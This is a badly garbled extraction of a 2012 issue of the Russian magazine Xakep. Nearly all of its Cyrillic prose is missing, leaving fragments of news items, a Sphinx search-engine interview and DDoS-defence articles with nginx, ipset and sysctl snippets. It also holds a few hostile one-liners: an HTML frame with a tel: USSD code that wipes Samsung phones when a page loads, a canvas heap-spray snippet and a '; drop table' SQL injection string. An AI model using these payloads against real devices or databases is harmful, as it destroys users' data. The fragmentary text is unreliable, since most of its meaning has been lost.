
INDIE-:

100

036

WWW.XAKEP.RU

11 (166) 2012

WINDOWS

HOWTO:
-
Raspberry Pi

: 230 .

18+
018

084

SPHINX:

058

128


DDOS

step (step@real.xakep.ru)

Andrushock (andrushock@real.xakep.ru)

(ilembitov@real.xakep.ru)

(kurchenko@real.xakep.ru)


PCZONE UNITS

(ilembitov@real.xakep.ru)

(goltsev@real.xakep.ru)

UNIXOID SYN/ACK

Andrushock (andrushock@real.xakep.ru)

MALWARE

Dr. Klouniz (alexander@real.xakep.ru)

PR-

(grigorieva@glc.ru)

DVD

ant (ant@real.xakep.ru)

Unix-

Andrushock (andrushock@real.xakep.ru)

Security-

D1g1 (evdokimovds@gmail.com)

ART
-

(alik@glc.ru)

PUBLISHING
, 119146, . , 1- ., . 5
.: (495) 934-70-34, : (495) 545-09-06


-
.: (495) 935-70-34, : (495) 545-09-06

DDOS

E-mail: advert@glc.ru

- . ,
, :
. DDoS. , ,
, .
,
.

( Anonymous).

:
,
. : ,
DDoS?
? , .
Qrator, ,

DDoS-. , , -, , -, ,
-, .
:
DDoS .

Step ,
][
twitter.com/stepah

(kosheleva@glc.ru)

(dolganova@glc.ru)

(dmitryuk@glc.ru)

DVD-: claim@glc.ru.

- : http://shop.glc.ru
: (495) 545-09-06
: (495) 663-82-77
: 8-800-200-3-999
: 101000, , , / 652,
: , 125367, . , , . 10, 1
,
77-50451 04 2012 .
Scanweb, . 210 700 .
.
. ,
, . .
.

: content@glc.ru.
, , 2012

Content
006

HEADER
004
011

MEGANEWS

hacker tweets
-

016
017


The Pirate Bay,
, 2009

-


Facebook
Proof-of-concept
Byzantium Linux:

COVERSTORY

018

Sphinx

COVERSTORY DDoS: D S
, ,
. ,

024 DDoS
030 DDoS
032

PCZONE
036

040
046

Indie Game: The Story


: ,



Sublime Text 2
jQuery-

100

105

110

X-MOBILE
050

054
058


,


Android

Android

112

062

068
074
080
084

090
094

124


- Raspberry Pi

Easy Hack



-


-
Netzob

IDAPython
X-Tools
7

MALWARE

046

Windows
, ACL/DACL


Linux

LXC

SYN/ACK
128
133




Windows-

FERRUM
138
139

ASUS O!Play Media Pro


Upgrade
OCZ VERTEX 4 25SAT3-256G
Vertex

140
143

096

Highload. 5

UNIXOID
118

PHREAKING


C#
Unity 3D
Windows Phone



,

144

105

FAQ

8,5
WWW2
web-

MEGANEWS
APPLE
12

IOS 6


iPhone 5 Cydia.

SONY .



Apple. ,
AntiSec 12 UDID Apple. ,
!
, Pastebin
(, , ). ,
, ?
,
,
,
.
. Apple, , , ,
UDID.
.

, Blue Toad , .
, , 98%.
, , .

iOS 6, ,
,
UDID. Apple


.


WINDOWS SERVER
2012, 100%-
PowerShell Metro,
.

004


.

,
20 .

Sony ,
. ,
Sony .
Sony. ,
, , -. NullCrew, e-mail
Sony, , . ,
Sony, .
Sony :
400 ,
. ,
, Sony. ,
, , , ,
.
,
LulzSecurity ,
Sony.

ICQ
, 30,8 20,5 . , Mail.Ru Group ,

.

RUSSIAN CODE
CUP 2012,
3000
.
10 000 .

FACEBOOK

.
( )

TechCrunch Disrupt.


-, RaspberryPi: is.gd/KgFVYb.


THE PIRATE BAY

,



, TPB
:
Google

.

2009 30 ( 4,3 ).
, ,
, .
,
, . ,
, ,
.
, ,
.
,
, .
,
, .
,
, .
. ,
-
Logica. - 2010
9000 . .




,
,
. ,
,
.
,

, .
, EPOC Emotiv System,

. , EPOC 299 .
NeuroSky,
MindWave, . ,
, .
.
, ? ,
. ,
:).

, 0 9 ,
EPOC.
16 , 90 .
,
.
PIN-
20% .

.
30% ,
60%! , Emotiv, NeuroSky
, . API

.
, ,
. ,
,
,
510 .

APPLE VS SAMSUNG:

,



, 2011 Subway 10 , 7 21 .

P2P-,
TOR



III, IMDEA
Networks . The Pirate
Bay , ( -)
, IP-
,
. -10 :

reddit
,
, .
- , -
ZeuS,
, , IRC, DDoS . , ,
Tor, ,
. Tor.
, ,
G Data Security Labs -. P2P-,
Tor,
, reddit.
G Data Security Labs ,
IRC-, .
,
:
, .

, IRC,
Tor.

                            IP
1  TvTeam          3808     924
2  scenebalance    2359     795
3  XxXRG           1225     63
4  sceneline       993      244
5  digital_ripper  870      38

ICM,
.
ICM :

10 000 ,

reddit,

5001000
. , ,

:

Bitcoin,
50
.

HEWLETT-PACKARD
- Open webOS
Apache 2.0, . ,
webOS

.

HP
, ,
.


                        Google PageRank   alexa.com
rutracker.org   4500    6                 281
tfile.ru        1100    4                 2551
rutor.org       950     6                 1296
kinozal.tv      900     5                 2240
my-hit.ru       850     4                 1262

(,
, ) ,
uniongang.tv ( ), relizlab.org rutor.org.
kikteam.net .



.

3 30

.

ZEROACCESS
1
,
Sophos.

100 000 .


.RU 17 2012 .


APPLE
IPHONE
Apple , . , iPhone, .
4S (
), .
A6, .
18% ( 7,6 ) 20%
( 112 ), iPhone 4S. iPhone 5
1136 640 .
iPhone 5 8 .
F/2,4. Full HD,
.
8- Lightning
( 80% ,
iPhone). , . ,
,
, , ,
,
. , Apple 30 pin
29 , Lightning-USB 19 . ,
, Apple , , Lightning iPhone iPod
.
, .
Apple NFC iPhone 5.
,

, .
- Apple , NFC
- ,
Passbook, .
,
iPhone 5 , Apple .
iPhone 5 ,
.
Apple 700 .




Apple iPhone 5,

, iPhone 4S,
(

).

, iPhone 5
Apple iPod,
EarPods,
, iOS6,
.

- TREND MICRO :


,




#hacker tweets
@0xcharlie


security- Twitter.
!

@Code_Analysis

? cout <<
(sizeof(char *) == 8) ? "64-bit" :
"32-bit"; . :
http://www.viva64.com/en/b/0162/ #cpp

-
-. ;)

tmux.

8)

@thomasbeagle

: Java

Java-. , ?

@garethheyes

JS pr : Error().
stack try catch.

@WTFuzz

HeapSpray
@ 0x10000:document.
createElement('canvas').
getContext('2d').
createImageData(0x10000000/4-0x20,1); .data
= byte[]

@dlitchfield

, ? Qualys
BrowserCheck Chrome
Windows
0x10000000? #DERP #FAIL #ASLR pic.twitter.com/NuDv5IRQ
, , 8)

, , ( INFO-BEZ
EXPO 2012 Security Awards FAIL ;) ):
#lulz #0-dayz
@NTarakanov

+ : ! ,
,
0-dayz?


, ,
-,
.
()
,
.

HTML5
HeapSpray 8)

@NTarakanov

@ryanaraine

! Apple iTunes c
160+ (CVE).

2012-,

,
METHOD_BUFFERED ,
METHOD_NEITHER.

@indi303

1 : man screen man

@NTarakanov

@corelanc0d3r

99 Java-,
patch.

@djrbliss

VOP
(Victory-Oriented Programming).
ROP/JOP/__OP,
VOP? .

, :)

@noahphex


,
.

@fdfalcon

-
SMS- SQL-?
1) . 2) . 3); drop table
answers;--


GOOGLE IE 8 GOOGLE APPS, StatCounter.


GALAXY

GO DADDY

SAMSUNG
Ekoparty ,
,
Ekoparty Samsung.
: Samsung TouchWiz,
, , Galaxy S II S III.
, , ( ) USSD-, (*),
(#) . , tel:. ,
- USSD- ,
NFC QR-.
HTML- <frame src="tel:*2767*3855#" /> USSD *2767*3855#, .
, , .
hugelaser.com/ac/ussdtest.php?conf=true. IMEI-, ,
, .

Samsung Galaxy S III 20 ,


S III Samsung .

NVIDIA
,
Tegra Intel ARM.


DRAM
50%
49%, IHS
iSuppli.
.

MICROSOFT Windows 7

(42,76%), Net
Applications. :
Mac OS X 7,13%.


Go Daddy,
50 . -
, DNS- CNS1.SECURESERVER.NET,
CNS2.SECURESERVER.NET CNS3.SECURESERVER.NET
.

,
Verisign,
. Anonymous
Own3r, .
,
, , ,
.
Go Daddy . , ,
AntiSec, ,
.
Go Daddy ,
,
.

39%

,
.
.

INTEL ,

INTEL WIRELESS
CHARGING TECHNOLOGY.

.


MICROSOFT ID Hotmail 16 .


GOOGLE?


(blog.jitbit.com),
. Adblock
( ) Google. , ,
81,5% 1280 960! 18,5% .
1920 1080
, . ,
, ?
, . . 45
5 ( ,
10 57)!

. , , Google
2007 , , 50% .

2.0 BLACKHOLE EXPLOIT KIT

, BLACKHOLE ,
-




. ,
362 2012-
30%! ,
.
,
.
, .
, ,
,
, . ? ,
,
,
, ,
. sci-fi.
, , , . ,

, 5% , , ,
.
1,52 (
80 ).
, . ,

, , , ,

.
,
, ,
.
, , , . ,
, ,
.
,
, .
.


CRIME

TLS SPDY

:
GOOGLE
,
GOOGLE . ?

BEAST

Liveinternet 2012 . ,
Chrome Google, , , ,
44,5% 43,2%.
, .
, ,
, 2011 Google ( )
. Chrome
Google. , ,
, ,
- ,
.
,
,
. ,
. Google
, , , IE
. ,
,
..
, uTorrent, Daemon Tools .
, , , .


, Chrome
Firefox.


.
BEAST, SSL/
TLS-.
CRIME (Compression Ratio Info-leak Made Easy)
SSL/TLS SPDY.
TLS . ,
. CRIME
zlib , BEAST.

,
JavaScript , cookie,
. ,
. ,
cookies, , , zlib
, .
, SSL/TLS.
, .

E INK

IFA 2012:
, e-ink-
. , ,


.



,
.

IPV4 .
IP- IPv4 /8

,
RIPE NCC.


KICKSTARTER . .



Apple
. , ,
, Android
, .
Amazon Kindle,
e-ink, ,
.
Kindle Fire . Android 4.0.
Kindle Fire ,
40% , (1 ) . -
159 .
, . Kindle
Fire HD : 7- 8,9-
( 1280 800 1920 x 1200 ). ,
.
OMAP 4.470 Texas Instruments, ,
Amazon, Tegra 3,
1 . HD-, HDMI-, Bluetooth
. : Kindle Fire HD LTE. ,

Wi-Fi-.
40%.
499 .
Amazon Barnes and Noble . , , Amazon,

Motorola, HTC LG , Motorola


RAZR i Android 4.0 Intel
Atom 2,0 . Motorola
Intel, . ,
Motorola .

.
NOOK ,
. , NOOK HD
7- TI OMAP
4470 1,3 , 1 , 8 16 . , GL Benchmark
60 , , Kindle
Fire HD. NOOK HD 8 200, 16
230 .
Google Acer
.
Android, ,
Acer Acer CloudMobile
A800. ?
Aliyun, Alibaba
Cloud Computing. Linux, Alibaba
2011 . Aliyun OS
(Tianyu Haier). Acer
Google, ,
- . .

BLIZZARD


WORLD OF WARCRAFT

,
USER ID, TIME
REALM ASCII

HEADER

FACEBOOK
,
,
( ),
. ,

,
.
Facebook ,
. ,
,
,
.

, ,
Open
Graph. , iOS Apple
Facebook .

,
Facebook.
? .

5
1.
!

, .
( )
. ,
, .
2.

code review.
,
-
.

, Phabricator.
.


Differential
code review.
Maniphest -.
Herald
. , , :
- ,
,
,
. ,
Diffusion
code-,
.
- ,
, ,
, Dropbox. , Facebook (phabricator.org),

.
4. Facebook feature
branch
,
. ?
,
.
Facebook? ,

GateKeeper ,
.


Facebook, .
, ,
,
.
launch ,
(, 10%
).
5.
(
Facebook),
.
,

.
,
. ,
(
Phabricator), ,
.
Facebook

,
.
.
. z


(alizar@gmail.com)

Proof-of-Concept
BYZANTIUM LINUX:


, ?
, , . C ,
. ,

. ,
,
( Byzantium ) .
, .
, .


Byzantium (mesh
network) 802.11
.
,
, , , .
HacDC (hacdc.org) OSI layer 2 802.11,
. Wi-Fi . OSI
layer 3 () 70 -

. 1.
- ,


. 2.

: . bit.ly/SHaSBa. Open 802.11s, Linux FreeBSD, OLSR (Optimized Link


State Routing), BATMAN-Advanced (Better Approach To Mobile Ad-hoc
Networking) Babel.
, .


.
Wi-Fi- .
.
Byzantium Linux
v0.2a (project-byzantium.org/download). ISO- 460 .
, LiveCD
.
LiveCD . , memento mori.

(. 1),
(. 2),

(, SSL).
,
:
,
-. ,
. ,
P2P.
Byzantium Linux

. Byzantium Linux LiveCD.
-,
, , : https://github.com/Byzantium/Byzantium/issues.


COVERSTORY

SPHINX


SPHINX
, The Pirate Bay, AVITO.ru, Craigslist,
Tumblr, Dailymotion ? ,
Sphinx.

,
. Depeche Mode,
,
, ][ Sphinx .


FREEBSD
300

Sphinx
Craigslist.

.
-. ,

. 130
, .
,
- , - ,
,
. ,
,
.
.
,

(jail FreeBSD). 128
200300
, , , .

mnoGoSearch ,
C++. -,
( )
.
.

.
.
24 !
, mnoGoSearch.
,
.
,
mnoGoSearch :).
:

. , control freaks, .
, .
,
,
, . , ,
,
.
- .
, , , ,
, , .
.


SPHINX


1030
Basic
14



,

game developer


10 15 /

200 400

1


300
, 40

Solr/
Lucene, ElasticSearch


COVERSTORY
Depeche Mode I feel you. .
.
,

, ,
.

. ,
- ,
.
-
,
.
, .
,
. , ,
. ,

,
.
, .
, , - .

.
,
Percona,
MySQL. , ,
. ,
,
, ,
. ,
.
Sphinx
. : ,

(oper.ru).
, 50 50 ,
- .
99%
:
,
. ,
, .
Sphinx .
, . -

, ,
-
, . ,
.

.
. : ,
, ,
.
, .
?
.
,
1 1 000 000.
1 000 000
2 000 000. , .
,
-

.
, :
,
, ,
... ? .
, Sphinx,
,
. -
Sphinx
Apache Solr (
).

?

: ,
.
,
: , ,
,
,
(,
).
.
.
:
.
?
,
,
.



: ,


Microsoft Word!

, ,

, .
.

, . -.

, ,
. -
: ,
. (
)
.

, ,
?
, ,
, . .
: .
.
. ,
-.
Google, Yandex . , ,
,
.
, ?

,
, . .
. , ,
, ,
.
,
,
. 3000 (, ,
),
, .
,
.
.
sphinx, , , .
Google
IP-,
. , ,

.
,
,
.
, . ,


( Google ),

IP-, , , ,
. ,
, .

BM25
,
,
. :

,

,
, .


. Open Source
.

, Open Source
( Open Source)
.

BM25, ( )
.
BM25 - 80-,
2000-
,
.
: BM25
. ,
,
,

, .
.
,
. , .

,
. BM25
, , ,
. .
, BM25
(TF), IDF
,
. ,

, , . , ,
,
, .
- , , .
.

( )
. TF
.
TF, IDF? IDF inverse document
frequency, , .

, .
,
.
, IDF.

.
TF (term frequency).
, .
. .
,
. ,
,
BM25? :
.
.
.
, .
. ,
. .
, BM25.
? ,
,
, (
),
,
, TF.


COVERSTORY
,
, IDF.
.
, .
TF (), ,
, .
TF , IDF
. ,
. .
, :
( BM25), Sphinx
. BM25,
? .
.
.
.
- .
:
,
. ,
.


,
. , ,
. , ,
.
,



.
,

.
, 25. , .
,
,
123 10,
20 30.
11, 48 92.
, 123
123
123
.

,
. .
.

.
.
,
.

.

. ,
.
. -

.

.
. TF?
. IDF? ,
.
,
LCS (Longest Common Subsequence) .
,
. ,
,

, .
.
page rank, .
? ,
.
, ,
. ,
,
123
, .

,
. ,
,

, , , .
,
.
Sphinx
. , .

,
MySQL.
. ,
,

.

, .
,
,
, .
BM25
?
,
, IDF.
,
,
,
.

, . - 12 ,



. : ,

,
,
,
.

SPHINX?
. Open Source
.
, .

. ,
,
, ,
. ? .
? .
, , Sphinx
The Pirate Bay. , ,

, .
- - Sphinx,
.
- e-mail
,
. .
,
- Sphinx. The
Pirate Bay . Mininova,
, .
RuTracker , .
, .
, Craigslist,
,
.
BoardReader, Social
Radar ,
Sphinx 20 . , ,
Sphinx, 100
1 . !
.
, Google, Facebook
Yahoo! Sphinx. ,
, -
,
,
, .

OPEN SOURCE
Sphinx, ,
,


. . , ,
: ,
,
, !
.
,
MySQL , ,
- . , -
, Sphinx
.
. ,
.
,
Sphinx
, . .
Sphinx
.
,
API .
Sphinx ,
, ... , .
- : , .

. ,
,
. Open Source , ,
.
:
- .
,
. , , :).

,
, . , .
,
-
200 .
,
.
,
Sphinx . ,

GPL,

. .

MySQL c Oracle Red Hat


Microsoft. ,
,
Open Source . Open Source
, .
- ,
, ,

.


, .
-
,
. , ,
. .
.
,
.

.
,
. ,
-, : ,
.
: ,
, , , .
, , . , -, ... , -
,
!
( ).
?
, ,
-
. - , ,
,
.
e-mail, Skype
IRC . ,
- - , ,
.
.
. ,
IT, . Open
Source ,
. ,
: -! - C++ , - - , ,
, ... , ,
,
! . .

, , , , , ,
, , , ,
. z


COVERSTORY

, Qrator

DDOS
16
DDOS-

DDoS- , .
,
.

DDoS


, .
, .


,
, Slowloris,
Apache, SYN-
, Amazon EC2.
DDoS .
WINDOWS SERVER
, ,
(2003 2008 ), DDoS
.

: ,
.
, Windows Server
, .
DDoS- ,
Linux. ( 2.6),
iptables ipset (
IP-), .
, .

APACHE
Apache. ,
, Apache,
nginx lighttpd.

Apache' , ,
, ( ) Slowloris,
.
Slowloris Apache Antislowloris.diff, mod_noloris, mod_antiloris, mod_limitipconn,
mod_reqtimeout... ,
HTTP-, Slowloris
. , nginx.

DDOS
, DDoS?
- HTTP-, grep ( ) , .
... . ,
, -. , . ,
, grep
IP-, .
, , ,
. :
grep,
. , , .

TESTCOOKIE
, ,
. DDoS,

testcookie-nginx (https://github.com/kyprizel/testcookie-nginx-module),
@kyprizel. . , HTTP-,
HTTP cookie .

cookies , DoS-
JavaScript- (
). Testcookie-nginx
L7 DDoS-,
. ? HTTP
Redirect, JavaScript, ,
( JavaScript ,
, , Firefox, ). :
Set-Cookie + 301 HTTP Location;
Set-Cookie + HTML meta refresh;
, JavaScript.
,
AES-128
JavaScript.
Flash,
( Flash, , ), , , ( ). ,
testcookie-nginx . , ,
(
) nginx.
, testcookie :
, Googlebot. testcookie , ,
;
Links, w3m ;
,
JavaScript.
, testcookie_module . ,
, , Java C#,
. .
444
DDoS . ,
. ,

,
. ? .

, , .
Nginx 444, :

location /search {
return 444;
}

, , URL. , location /search (, ,


/search), ipset shell-:
# add to the "ban" set every client IP whose request was answered with 444
ipset -N ban iphash
tail -f access.log | while read -r LINE; do echo "$LINE" | \
cut -d'"' -f3 | cut -d' ' -f2 | grep -q 444 && ipset -A ban "${LINE%% *}"; done

- ( combined) , ,
cut .

.
SQL- explain.


444
.

, . , -
-- . ( ),
GeoIP , .
, :
1. nginx GeoIP- (wiki.nginx.org/HttpGeoipModule).
2. access log.
3. , -,
grep accesslog nginx .

,
, , . ,
, .
PHP,
. ,
,
, . !

, , ,
.
(POC)
, @SaveTheRbtz,
PyBrain,
(habrahabr.ru/post/136237). ,
:). , ,
, , ,
.
access.log DDoS',
100% , ,
dataset .
.


? DDoS , ? . .
, , , , -DDoS-

. .
, , -
, ,
DDoS- , , , ,
. , ,
- DDoS-,
, .
.
,
, . , , .

- PHP + MySQL
:

Xdebug , ;
APD
, ;



,
, .
. nginx

: request_time upstream_response_time. ,
; , (Apache, php_fpm,
uwsgi...) . upstream_response_time
,
. :

log_format xakep_log '$remote_addr - $remote_user [$time_local] '
                     '"$request" $status $body_bytes_sent '
                     '"$http_referer" "$http_user_agent" $request_time '
                     '$upstream_response_time';

combined- .


.
nginx

shell- (
ACCESS_LOG
nginx combined-):

echo $(($(fgrep -c "$(env LC_ALL=C date --date=@$(($(date +%s)-60)) +%d/%b/%Y:%H:%M)" "$ACCESS_LOG")/60))


, .
, , , ,
, , .
. , ,
.
,
.
TCPDUMP
, tcpdump
. .
2011- Linux,

TCP- TCP- SYN RST.


,
,
, . , , . : nginx
.

10


, ,
. , ,
, . Tcpdump .
,
, , , tcpdump' ,
. production' .

. ,
,
.
ngrep
.
?
DDoS-, ,
?
, .

. ,

, . ,
-

.
, ,
-, .
. ,
( )
, ,
, ? -.
, , , Google Analytics,
.

11

-
? ,
nginx , .
.
nginx.

( ) NGINX
?
.
.
.
nginx.
client_header_buffer_size
.

, ,
large_client_header_buffers.
large_client_header_buffers

.
client_body_buffer_size
.
,
.
client_max_body_size
, Content-Length .
, 413 (Request
Entity Too Large).

12


- NGINX
.
,

nginx.

reset_timedout_connection on;
,
FIN-WAIT.
client_header_timeout
- .
client_body_timeout
- .
keepalive_timeout
-, keep-alive
.
, ,
. -
HTTP- Keep-Alive, Internet Explorer ,

send_timeout
- .
, .

13

: - ? , .
.
,
( ), . ,
.
( -):
1. .
2. .
3.
. . 2.
4. .

/ . ,
AJAX long polling , , long polling -
20 , ,
.
NGINX
(LIMIT_CONN LIMIT_REQ)
nginx , .

,
, ,
, , nginx. ,
. ,
swap. , .
, /download /search. :
, ( download-) TCP-
;
, ( )

.

14

http {
    limit_conn_zone $binary_remote_addr zone=download_c:10m;
    limit_req_zone $binary_remote_addr zone=search_r:10m rate=1r/s;
    server {
        location /download/ {
            limit_conn download_c 1;
            # location
        }
        location /search/ {
            limit_req zone=search_r burst=5;
            # location
        }
    }
}

limit_conn limit_req locations,
( , ).
,
,
.
10m . ,

10 .
320 000 TCP-.

$binary_remote_addr, IP-
,
$remote_addr. ,
limit_req_zone

DDOS
1.
. SYN 10 .
2.
DNS. UDP- DNS- spoof
IP-
.
( )
DNS-. , ,
.
3. , , .


5
, ,

.
4. ,
JavaScript, , .
,

.


IP, nginx,
, , ,
, $binary_remote_addr$http_user_agent $binary_remote_addr$http_cookie_myc00kiez , , 32-
$binary_remote_addr,
10m .


nginx, .
net.ipv4.tcp_syncookies sysctl,
SYN-flood .

() .
. :

net.ipv4.tcp_fin_timeout
, TCP- FIN-WAIT-2 (
FIN/ACK-).
net.ipv4.tcp_{,r,w}mem
TCP. : ,
.
net.core.{r,w}mem_max
TCP .

15

100 / -
; c,
- :
sysctl -w net.core.rmem_max=8388608
sysctl -w net.core.wmem_max=8388608
sysctl -w net.ipv4.tcp_rmem='4096 87380 8388608'
sysctl -w net.ipv4.tcp_wmem='4096 65536 8388608'
sysctl -w net.ipv4.tcp_fin_timeout=10

: http://bit.ly/8U0SDq.
/PROC/SYS/NET/**
/proc/sys/net/**. , , ,

. Linux- (
),
-
,
. ,
,
,
.

16

!
DDoS- e-commerce, , c
. -
. ,
. ,
. , DDoS- , ,
,
. z


DDOS


Low Orbital
Ion Cannon (LOIC) . ,
. ,
,
,
DDoS , , .
.

?
, LOIC
. .
JS LOIC
JS LOIC HTTP-.
: referer
, , URI,

- .
LOIC .
? .
.


LOIC UDP
LOIC UDP.
. UDP-
48 HTTP-. ?
UDP- www-?
access-. : LOIC TCP TCP-
.
? : ,
. - nginx, Varnish
.

HOIC
HOIC (High Orbit Ion Cannon) c
.
, , ,

.
URL, . ,
.

LOIC HTTP
, ,
LOIC HTTP. .
: GET / ,
,
. ,
,
.

, DDoS? LOIC / HOIC / JS LOIC / OWA /


SLOWPOST
. DDoS,
, , .

full browser stack: Flash,
cookie, , JavaScript. , ! - .
LOIC. ,
.

? ,
-, , . , Anonymous

SLOWPOST

Anonymous OWASP/SLOWPOST.

, ,
.
. ,
TCP-, :
bit.ly/tcpmanual.


, HLL

(
False Positives).
, .


LOIC?
- DDoS
.
, ,
. , ,
,
, ,
, . ,
,
- ][.

Facebook. (
DDoS). ,
. Google ,
, , , , .
,
. , ,
, .

Anonymous?
DSL-.
. -
. X. ,
Anonymous
: -
( ,
Sony )

,
. ,
,
.

3: .
:
.
.
4: mod_security Apache , ,
.
: Apache, , 2012
.
,
.
5:
Snort regexp'
?
: :

userland regexp? ,
,
,
.

,
. ,
, .
1:
HTTP/1.0 + Host.
, -
, HTTP/1.0 Host.
:
.
.


: , , -, . (Eldar
Zaitov)
nginx. 15
cookbook
.

: ANONYMOUS VS. DNS?


Anonymous DNS-. ?
, ! DNS- BGP-anycast, ,
Qrator. , ,
. ,
BGP . Anonymous , ,
-, , .


2:
,
,
fingerprinting.
: , -, . Opera Mini
. False Positives.


-
.
.

, . DDoS . . DDoS-


. Anonymous, ,
!
. ,
, :). .
, ,
. z


, Qrator

:
,

DDoS- 40 /? .
. .

.

,
.

() IP- ,
,
.
. -,
( -
RIPE). :
( ,
);
( ,
);
( ,
, ).
-
BGP. - ,
(
, ).
AS_PATH.



prepend policy,
:
AS_PATH

222 333 444

222 333 333 333 444

333 ,
222. AS_PATH BGP : ,
AS_PATH , .
.
BGP
.
LOCAL_PREF,
,
AS_PATH. BGP
- : ,
, . . 1 , .
222 ,
( ).
222
. 222 .
,
default route, e .

:

:
1) ;
2) BGP;
3) ().
. ,
default route. , , ,


: ,

loopback-
default route.
?
IP- ,
-.
, TTL. ?
.
, .
14 .
DDoS-. : echo
request, ping,
echo reply. source
IP- DDoS-
. ,
:
1) , ;
2) , ;
3) , .
. -, ,

Qrator. -, DDoS
.
, ,
, . 700 c .

:
BGP
, , ,
, -
. , BGP .

2 .
BGP , DoS-:
.
BGP-,
BGP-. : - .
BGP? , .

[Fig. 1: diagram; labels: AS222, 2.2.2.0/24, Default route]

1. -, LOCAL_PREF.
,
. ,
BGP . BGP-, ,
,
. 30 .
,
,
. .
2. -
,
- default route.

(
default route).
3. BGP- prepend
policy .
- , ,
,
.

: ?
. . 2 , .
Tier-1 , ,
, .
, , 10%
. -

[Fig. 2 and Fig. 3: figure residue. AC174: DDoS 17, Default route: 25. AC3356-AC3549: DDoS 8, BGP: 12 prefixes affected, Default route: 86.]
-, ,
80% .
. . 3 Tier-1
. Level3 DDoS-, 17 , 25
default route. Cogent ,
c , BGP-.
.
default route ,
, DDoS- .
,
. ,
, ,
( ). BGP- (. 4)
,
,
, , .
, BGP,
.

(. 5) 50%.

:
10%.


. ,
, .
. , ,
,
. -
, .
, . ,
. , ,
, abuse request. ? -, - ,
,
.
, , ,
. c (. 6).
, , , ,
. ,
. default
route, , ,
.

[Fig. 4: chart; series: BGP, Default Routes, DDoS; vertical axis 5% to 45%; horizontal axis <1h, <2h, <4h, <8h]

,
. ,
.
ASX2 50 DDoS-,
,
350 . .
destination IP
, source IP- 2.2.2.0/24,
40 . , ,
. ?
, , BGP- ,
BGP-, ,
, BGP, . ,
, .

?
. .
. ,
-. . .
P. S.
DDoS-.
,
.
,
,
, RIPE. z

[Fig. 5 and Fig. 6: figure residue; axis ticks 2000 to 16000; labels: AC, BGP, 2.2.2.0/24, ASX1, ASX2, dst: amplifiers, src: 2.2.2.1, Max = 350*DDoS, > 50 amplifiers, Mean = 10*DDoS, DDoS*4, Default route = 40*DDoS]


Preview

30 .
.

PC ZONE
36

INDIE GAME: THE STORY


Steam

.


.

. , Minecraft
!

,
, .

-!

PC ZONE

46

SUBLIME TEXT 2

, .
, .

PHREAKING

62


-
Raspberry Pi.
418. ,
.


X-MOBILE

50




must-have
Android iOS
.

84


Netzob

-
.

58


,
Tasker SL4A,
.

MALWARE

96

WINDOWS

Windows.

.


PC ZONE

Pinkerator

150 mm

24 mm

INDIE GAME:
THE STORY

53

5R

:
,

, 2012,
Scream School (
).
, : ,
.
,
Mafia,
Warhorse. -,
, , .
? !


,
-?
.
, ,
,
.

2003 , Valve
Steam.

, .
,
, AAA-

Steam. ,
,
.



Minecraft.
. Braid, Super Meat
Boy .

Independent Games Festival , Game
Developers Conference.
1999 , 2005-
Fire And Darkness Shattered
Galaxy, 2005- - . Gish, Darwinia, Crayon
Physics Deluxe .
IGF
,
95 .
, ,
,
.

. , Ludum Dare,
. .

Gaminator, gamin.ru. ,
.


.
-
Indie Bundles.

,
. ,
,
.
, .

The Humble Indie Bundle V
599 003
5 108 509 . 500600
, .

Kickstarter,
.
,

Double Fine Adventure 2012 .
400 000 ,
. inXile entertainment
Wasteland 2 Stainless Games Carmageddon:
Reincarnation. !
, Kickstarter .
,
Amazon Payments.
Kickstarter ,
.


INDIE GAME: THE STORY


- Steam.
Valve
Steam Greenlight.
,
Steam .
Steam
,
.

. Diablo III
Metacritic
. , , , , , - , ,
. 60
,
.


, . , , , . ,
. .


, ? ?
-, .

.
,
roguelike.
-
PR-
.
, ,
, ,
.
,
, .
?

Tim (Braid)

Isaac (Binding of Isaac)


runs from his Mother

shoots tears

, ?
? !
,
.
.
,
.

,
. - ?
? ,
?
. ,
,
, . ,
.
MMORPG
, , ,
Blizzard
.

.

.
, .
,
, - ,

.

turns out to be the son of a bitch

can turn back time

drives princesses away


hates permadeath


.
?
PC, Mac Linux.
,
, ,
.


Unity Flash.

.
,
- .
, ,
1024 x 600 .
,
.



: , , ,


,
.
,
, .
, .
,
.
-. ,
,
. .
,
,
. ,


PC ZONE
, .
,
.
PR-
, .
-
. :
1. . -

.
2. . ,
, ,
,
,
e-mail
.
3. .
.


.
4. .
.
5.
, .
-
.
6. . .
,
.
-?

. ,
e-mail
. , , .

?
( ) -,
. Steam
.
,
.

.
, , ,

,
-
.

.
-. , ,
. ,
Retention
: , -


Super Meat Boy

hates Dr. Fetus

doesn't have skin


loves Bandage Girl

, 80% 40,
.
, Steam.
,
.
. ,
. .
, -
Valve .
,
Steam
. ,
.
Steam
.
.
Steam .
.
, .
, ,
.
,
,
e-mail.
.
,
.

.
,
.

Desura, , 500 .

. -

,
,
. , PayPal . , 30% .
- :
Desura IndieVania.
- , .
Desura
Steam, , ,
. 99 ,
.
Inner Dream
Desura . 24

- .
,
.
, , , Desura
Steam,
.
IndieVania

Desura,
.
-
Alientrap, ,
Capsized Nexuiz. , IndieVania
. -,
.
PayPal (5% + 0,05
)
.
,
.
-, -
. , . -


INDIE GAME: THE STORY

, .

1 .
, ,
45
.
, Desura, IndieVania ,
.
,
.
, ,
,
,
, ,
.
,
, ,
, -
.
, ,
10
. -
-, - .
, .
?

Humble Store -,

HIB. ,
.
, -
,
. ,
Steam- Steam -.
?
, Humble
Store BIT.TRIP RUNNER:
humblebundle.com/store/product/bittriprunner.
- Voxatron,
:
www.lexaloffle.com/voxatron.php.

ALPHA FUNDING

Alpha funding,
Minecraft. ,

- .

, Kickstarter, Desura
.
Alpha funding ,
.
,
, . ,
,
, .

Revenge of the Titans


The invasion has landed


-
-
, . ,
- ,
.
Because We May,
.
, -
,
.
,
, .
.
-, .
,
,
DRM-Free Steam/
Desura .
,
.

.

.

PROFIT?
?
, Notch .
Minecraft .
-
, .
, , .
,
,
. ,
.
,
.
, ,
, - , . Indie Game: The
Movie .

, . Braid, Super
Meat Boy
. . z
WWW

RETENTION SOMETIMES YOU


Retention -,
. ,
- , , , .
Retention
( ),


,
,
.
,

.

2011-,
Steam Trauma.
Trauma Retention ,

. ,

.
Trauma , Retention
!

.
,
.

Sometimes
You: www.sometimesyou.com;

Retention
Desura: www.desura.com/games/retention.


PC ZONE

(antonov.igor.khv@gmail.com)

, .
,
Google Reader
. RSS Google
Reader , ,
, .
, .
,

.



-
: ,
, iOS/Android, , Google Reader .
, .
. .



StumbleUpon
stumbleupon.com
( StumbleUpon)
, .
-
Stumble!. . ,
, . StumbleUpon
. /
, , .
, ,
.

: 7
: 8

: Free/Paid
:
